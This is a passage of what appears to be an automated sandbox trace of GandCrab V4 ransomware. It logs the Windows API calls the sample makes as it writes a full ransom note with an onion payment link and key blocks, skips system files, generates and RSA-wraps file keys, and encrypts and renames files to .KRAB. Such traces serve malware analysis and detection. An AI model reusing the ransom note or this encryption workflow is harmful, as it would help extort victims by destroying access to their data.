Sidebar\\Gadgets\\" [0100.021] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0100.022] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0100.022] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0100.022] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0100.022] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0100.022] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.022] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0100.022] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\\\KRAB-DECRYPT.txt") returned 82 [0100.022] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows sidebar\\gadgets\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0100.024] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0100.024] WriteFile (in: hFile=0x43c, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338e820, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338e820*=0x1f6e, lpOverlapped=0x0) returned 1 [0100.025] CloseHandle (hObject=0x43c) returned 1 [0100.026] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.026] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0100.026] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x2f, wMilliseconds=0xe7)) [0100.026] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0100.027] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0100.027] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0100.027] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\d2ca4a08d2ca4dee3d.lock") returned 88 [0100.027] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows sidebar\\gadgets\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x43c [0100.029] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.029] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.030] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\") returned 65 [0100.030] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\*") returned="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\*" [0100.030] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\*", lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 0xfbd3e0 [0100.030] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0100.030] FindNextFileW (in: hFindFile=0xfbd3e0, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0100.030] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0100.030] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0100.030] FindNextFileW (in: hFindFile=0xfbd3e0, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0100.030] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0100.030] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0100.030] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\d2ca4a08d2ca4dee3d.lock" [0100.030] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0100.031] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 93 [0100.031] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\d2ca4a08d2ca4dee3d.lock") returned 88 [0100.031] lstrlenW (lpString=".lock") returned 5 [0100.031] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0100.031] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".lock ") returned 6 [0100.031] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.031] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.032] FindNextFileW (in: hFindFile=0xfbd3e0, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0100.032] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0100.032] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0100.032] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\KRAB-DECRYPT.txt") returned="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\KRAB-DECRYPT.txt" [0100.032] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0100.032] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\KRAB-DECRYPT.txt.KRAB") returned 86 [0100.032] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\KRAB-DECRYPT.txt") returned 81 [0100.032] lstrlenW (lpString=".txt") returned 4 [0100.032] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0100.032] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".txt ") returned 5 [0100.033] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.033] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\KRAB-DECRYPT.txt") returned 81 [0100.033] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\KRAB-DECRYPT.txt") returned 81 [0100.033] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0100.033] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0100.033] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0100.033] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0100.033] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0100.033] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0100.033] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0100.033] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0100.033] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0100.033] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0100.033] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.034] FindNextFileW (in: hFindFile=0xfbd3e0, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 0 [0100.034] FindClose (in: hFindFile=0xfbd3e0 | out: hFindFile=0xfbd3e0) returned 1 [0100.034] CloseHandle (hObject=0x43c) returned 1 [0100.034] FindNextFileW (in: hFindFile=0xfbdb20, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0100.034] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0100.034] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0100.034] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\KRAB-DECRYPT.txt") returned="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\KRAB-DECRYPT.txt" [0100.034] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0100.034] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\KRAB-DECRYPT.txt.KRAB") returned 78 [0100.034] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\KRAB-DECRYPT.txt") returned 73 [0100.034] lstrlenW (lpString=".txt") returned 4 [0100.034] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0100.035] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".txt ") returned 5 [0100.035] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.035] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\KRAB-DECRYPT.txt") returned 73 [0100.035] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\KRAB-DECRYPT.txt") returned 73 [0100.035] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0100.035] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0100.035] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0100.035] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0100.035] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0100.035] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0100.035] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0100.035] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0100.035] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0100.035] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0100.036] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.036] FindNextFileW (in: hFindFile=0xfbdb20, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0100.036] lstrcmpW (lpString1="settings.ini", lpString2=".") returned 1 [0100.036] lstrcmpW (lpString1="settings.ini", lpString2="..") returned 1 [0100.036] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\", lpString2="settings.ini" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\settings.ini") returned="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\settings.ini" [0100.036] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0100.036] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\settings.ini.KRAB") returned 74 [0100.036] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\settings.ini") returned 69 [0100.036] lstrlenW (lpString=".ini") returned 4 [0100.036] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0100.037] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".ini ") returned 5 [0100.037] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.037] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\settings.ini") returned 69 [0100.037] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\settings.ini") returned 69 [0100.037] lstrcmpiW (lpString1="settings.ini", lpString2="desktop.ini") returned 1 [0100.037] lstrcmpiW (lpString1="settings.ini", lpString2="autorun.inf") returned 1 [0100.037] lstrcmpiW (lpString1="settings.ini", lpString2="ntuser.dat") returned 1 [0100.037] lstrcmpiW (lpString1="settings.ini", lpString2="iconcache.db") returned 1 [0100.037] lstrcmpiW (lpString1="settings.ini", lpString2="bootsect.bak") returned 1 [0100.037] lstrcmpiW (lpString1="settings.ini", lpString2="boot.ini") returned 1 [0100.037] lstrcmpiW (lpString1="settings.ini", lpString2="ntuser.dat.log") returned 1 [0100.037] lstrcmpiW (lpString1="settings.ini", lpString2="thumbs.db") returned -1 [0100.037] lstrcmpiW (lpString1="settings.ini", lpString2="KRAB-DECRYPT.html") returned 1 [0100.037] lstrcmpiW (lpString1="settings.ini", lpString2="KRAB-DECRYPT.txt") returned 1 [0100.037] lstrcmpiW (lpString1="settings.ini", lpString2="CRAB-DECRYPT.txt") returned 1 [0100.037] lstrcmpiW (lpString1="settings.ini", lpString2="ntldr") returned 1 [0100.037] lstrcmpiW (lpString1="settings.ini", lpString2="NTDETECT.COM") returned 1 [0100.037] lstrcmpiW (lpString1="settings.ini", lpString2="Bootfont.bin") returned 1 [0100.038] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0100.038] CryptAcquireContextW (in: phProv=0x338e9b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9b4*=0x1010df8) returned 1 [0100.038] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0100.039] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0100.039] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0100.039] CryptGenRandom (in: hProv=0x1010df8, dwLen=0x20, pbBuffer=0x338ea4c | out: pbBuffer=0x338ea4c) returned 1 [0100.039] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0100.039] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.039] CryptAcquireContextW (in: phProv=0x338e9b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9b4*=0x1011238) returned 1 [0100.040] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0100.040] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0100.040] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0100.041] CryptGenRandom (in: hProv=0x1011238, dwLen=0x8, pbBuffer=0x338ea6c | out: pbBuffer=0x338ea6c) returned 1 [0100.041] CryptReleaseContext (hProv=0x1011238, dwFlags=0x0) returned 1 [0100.041] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.041] CryptAcquireContextW (in: phProv=0x338e9ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9ac*=0x10110a0) returned 1 [0100.041] CryptImportKey (in: hProv=0x10110a0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e9b0 | out: phKey=0x338e9b0*=0xfbd7a0) returned 1 [0100.041] CryptGetKeyParam (in: hKey=0xfbd7a0, dwParam=0x8, pbData=0x338e9a4, pdwDataLen=0x338e9a8, dwFlags=0x0 | out: pbData=0x338e9a4*=0x800, pdwDataLen=0x338e9a8*=0x4) returned 1 [0100.041] CryptEncrypt (in: hKey=0xfbd7a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338e9dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338e9dc*=0x100) returned 1 [0100.045] GetLastError () returned 0x0 [0100.045] CryptDestroyKey (hKey=0xfbd7a0) returned 1 [0100.045] CryptReleaseContext (hProv=0x10110a0, dwFlags=0x0) returned 1 [0100.045] CryptAcquireContextW (in: phProv=0x338e9ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9ac*=0x1011898) returned 1 [0100.046] CryptImportKey (in: hProv=0x1011898, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e9b0 | out: phKey=0x338e9b0*=0xfbd3e0) returned 1 [0100.046] CryptGetKeyParam (in: hKey=0xfbd3e0, dwParam=0x8, pbData=0x338e9a4, pdwDataLen=0x338e9a8, dwFlags=0x0 | out: pbData=0x338e9a4*=0x800, pdwDataLen=0x338e9a8*=0x4) returned 1 [0100.046] CryptEncrypt (in: hKey=0xfbd3e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338e9dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338e9dc*=0x100) returned 1 [0100.046] GetLastError () returned 0x0 [0100.046] CryptDestroyKey (hKey=0xfbd3e0) returned 1 [0100.046] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0100.046] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\settings.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows sidebar\\settings.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0100.060] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0100.060] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0100.061] ReadFile (in: hFile=0x43c, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ea7c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ea7c*=0x50, lpOverlapped=0x0) returned 1 [0100.076] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xffffffb0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0100.076] WriteFile (in: hFile=0x43c, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x338ea78, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ea78*=0x50, lpOverlapped=0x0) returned 1 [0100.076] WriteFile (in: hFile=0x43c, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ea78, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ea78*=0x208, lpOverlapped=0x0) returned 1 [0100.076] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.080] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.080] CloseHandle (hObject=0x43c) returned 1 [0100.080] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.081] MoveFileW (lpExistingFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\settings.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows sidebar\\settings.ini"), lpNewFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows 